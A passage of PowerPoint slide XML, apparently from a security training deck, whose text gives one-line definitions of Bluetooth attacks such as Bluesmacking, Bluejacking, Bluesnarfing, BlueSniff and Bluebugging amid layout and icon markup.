            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3995738" y="2782888"/>
                <a:ext cx="19050" cy="2063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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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67" name="Rectangle 77"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4032250" y="2782888"/>
                <a:ext cx="20638" cy="2063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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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68" name="Rectangle 78"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4070350" y="2782888"/>
                <a:ext cx="17463" cy="2063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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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69" name="Rectangle 79"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3957638" y="2746375"/>
                <a:ext cx="20638" cy="1746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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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70" name="Rectangle 80"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3995738" y="2746375"/>
                <a:ext cx="19050" cy="1746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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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71" name="Rectangle 81"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4032250" y="2746375"/>
                <a:ext cx="20638" cy="1746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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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72" name="Rectangle 82"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4070350" y="2746375"/>
                <a:ext cx="17463" cy="1746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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Group 26"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="684053" y="2591383"/>
            <a:ext cx="1028700" cy="1028700"/>
            <a:chOff x="2164520" y="3963566"/>
            <a:chExt cx="2057400" cy="2057400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Rectangle 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2164520" y="3963566"/>
              <a:ext cx="2057400" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom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217"/>
              <a:endParaRPr lang="en-US" sz="36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pSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="76" name="Group 75"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2632566" y="4458013"/>
              <a:ext cx="1121306" cy="1109250"/>
              <a:chOff x="7353301" y="3013075"/>
              <a:chExt cx="295275" cy="292100"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="77" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7391401" y="3013075"/>
                <a:ext cx="257175" cy="176213"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="93" y="36"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="94" y="29"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="65" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="40" y="16"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="33" y="15"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="15" y="32"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="51"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="51"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="18" y="44"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="22" y="44"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="51" y="29"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="87" y="66"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="87" y="70"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="87" y="70"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="102" y="51"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="93" y="36"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="102" h="70">
                    <a:moveTo>
                      <a:pt x="93" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="34"/>
                      <a:pt x="94" y="32"/>
                      <a:pt x="94" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="13"/>
                      <a:pt x="81" y="0"/>
                      <a:pt x="65" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="0"/>
                      <a:pt x="44" y="7"/>
                      <a:pt x="40" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="15"/>
                      <a:pt x="35" y="15"/>
                      <a:pt x="33" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="15"/>
                      <a:pt x="15" y="23"/>
                      <a:pt x="15" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="36"/>
                      <a:pt x="0" y="43"/>
                      <a:pt x="0" y="51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5" y="47"/>
                      <a:pt x="11" y="44"/>
                      <a:pt x="18" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="44"/>
                      <a:pt x="20" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28" y="35"/>
                      <a:pt x="39" y="29"/>
                      <a:pt x="51" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="29"/>
                      <a:pt x="87" y="46"/>
                      <a:pt x="87" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="67"/>
                      <a:pt x="87" y="68"/>
                      <a:pt x="87" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="70"/>
                      <a:pt x="87" y="70"/>
                      <a:pt x="87" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96" y="66"/>
                      <a:pt x="102" y="59"/>
                      <a:pt x="102" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="45"/>
                      <a:pt x="98" y="40"/>
                      <a:pt x="93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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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78" name="Freeform 113"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7353301" y="3124200"/>
                <a:ext cx="257175" cy="180975"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="94" y="36"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="95" y="29"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="66" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="40" y="16"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="33" y="14"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="15" y="32"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="51"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="29" y="72"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="73" y="72"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="102" y="51"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="94" y="36"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="102" h="72">
                    <a:moveTo>
                      <a:pt x="94" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="94" y="33"/>
                      <a:pt x="95" y="31"/>
                      <a:pt x="95" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="13"/>
                      <a:pt x="82" y="0"/>
                      <a:pt x="66" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="0"/>
                      <a:pt x="45" y="6"/>
                      <a:pt x="40" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="15"/>
                      <a:pt x="36" y="14"/>
                      <a:pt x="33" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="14"/>
                      <a:pt x="15" y="22"/>
                      <a:pt x="15" y="32"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="36"/>
                      <a:pt x="0" y="43"/>
                      <a:pt x="0" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="63"/>
                      <a:pt x="13" y="72"/>
                      <a:pt x="29" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="72"/>
                      <a:pt x="73" y="72"/>
                      <a:pt x="73" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="72"/>
                      <a:pt x="102" y="63"/>
                      <a:pt x="102" y="51"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="45"/>
                      <a:pt x="99" y="40"/>
                      <a:pt x="94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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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</p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="30" name="Group 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8056258" y="2591383"/>
            <a:ext cx="1028700" cy="1028700"/>
            <a:chOff x="15367720" y="3963566"/>
            <a:chExt cx="2057400" cy="2057400"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="15367720" y="3963566"/>
              <a:ext cx="2057400" cy="2057400"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4"/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217"/>
              <a:endParaRPr lang="en-US" sz="360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pSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="85" name="Group 84"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks noChangeAspect="1"/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="15896706" y="4439930"/>
              <a:ext cx="1074285" cy="1074285"/>
              <a:chOff x="3878263" y="2463800"/>
              <a:chExt cx="257175" cy="257175"/>
            </a:xfrm>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="86" name="Freeform 51"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3878263" y="2463800"/>
                <a:ext cx="257175" cy="2571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62"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="162" y="162"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="162" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="150" y="151"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="11" y="151"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="11" y="12"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="150" y="12"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="150" y="151"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="162" h="162">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="150" y="151"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="11" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="150" y="15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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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87" name="Freeform 52"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3932238" y="2519363"/>
                <a:ext cx="157163" cy="155575"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="16" y="98"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="50" y="65"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="81" y="98"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="99" y="82"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="66" y="49"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="99" y="17"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="81" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="50" y="33"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="16" y="0"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="17"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="32" y="49"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="0" y="82"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="16" y="98"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="99" h="98">
                    <a:moveTo>
                      <a:pt x="16" y="98"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="50" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="82"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="9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914217">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Rectangle 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6BB42381-D6A3-45A7-B10F-8E39BAD17E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4341" y="3705316"/>
            <a:ext cx="2414732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914217" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bluesmacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/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C8560548-DF86-4CC5-81FE-88862F0D2235}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2623203" y="3705316"/>
            <a:ext cx="2414732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914217" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bluejacking</a:t>
            </a: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16D2D6A5-577F-4619-8AA3-63C90E18972A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5355050" y="3705316"/>
            <a:ext cx="1765878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914217" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bluesnarfing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/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DE41FE8A-7CA6-4863-A225-5962EC73D94A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2819400" y="4181312"/>
            <a:ext cx="2215464" cy="1977464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defTabSz="914217"/>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>The art of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>sending unsolicited messages </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>over Bluetooth to Bluetooth-enabled devices, such as mobile phones and laptops</a:t>
            </a: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4EB0D679-2CAE-40DF-86F9-3DF028E20B4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319603" y="4181312"/>
            <a:ext cx="2071797" cy="143885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defTabSz="914217"/>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>theft of information </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>from a wireless device through a Bluetooth connection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6CFD3A19-73F8-4A53-B4E0-87A0382E3DDC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111859" y="4181312"/>
            <a:ext cx="2351121" cy="1438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t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr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4217">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>DoS attack, which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>overflows Bluetooth-enabled devices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>with random packets, causes the devices to crash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99DCDE1E-8501-4EC8-A301-9888F554030A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7684837" y="3705316"/>
            <a:ext cx="1810596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914217" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>BlueSniff</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/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E9CA5B81-5C4D-414E-BC3E-197D8F426193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9751194" y="3705316"/>
            <a:ext cx="2195211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914217" fontAlgn="base">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bluebugging</a:t>
            </a:r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47C7A60D-F5C1-43F5-937C-1D5E63F104B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7854660" y="4181312"/>
            <a:ext cx="1898940" cy="116955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defTabSz="914217"/>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Proof of concept code for a Bluetooth </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wardriving</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> utility</a:t>
            </a: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21DBA32F-BFB8-4A28-88F4-41908DF70002}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9829800" y="4181312"/>
            <a:ext cx="2024442" cy="116955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defTabSz="914217"/>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>Remotely accessing a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bluetooth-enabled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> device and using its features</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Text Box 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB788586-73B5-44A0-A846-3EFC542B0E08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647701" y="1122579"/>
            <a:ext cx="10896599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t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
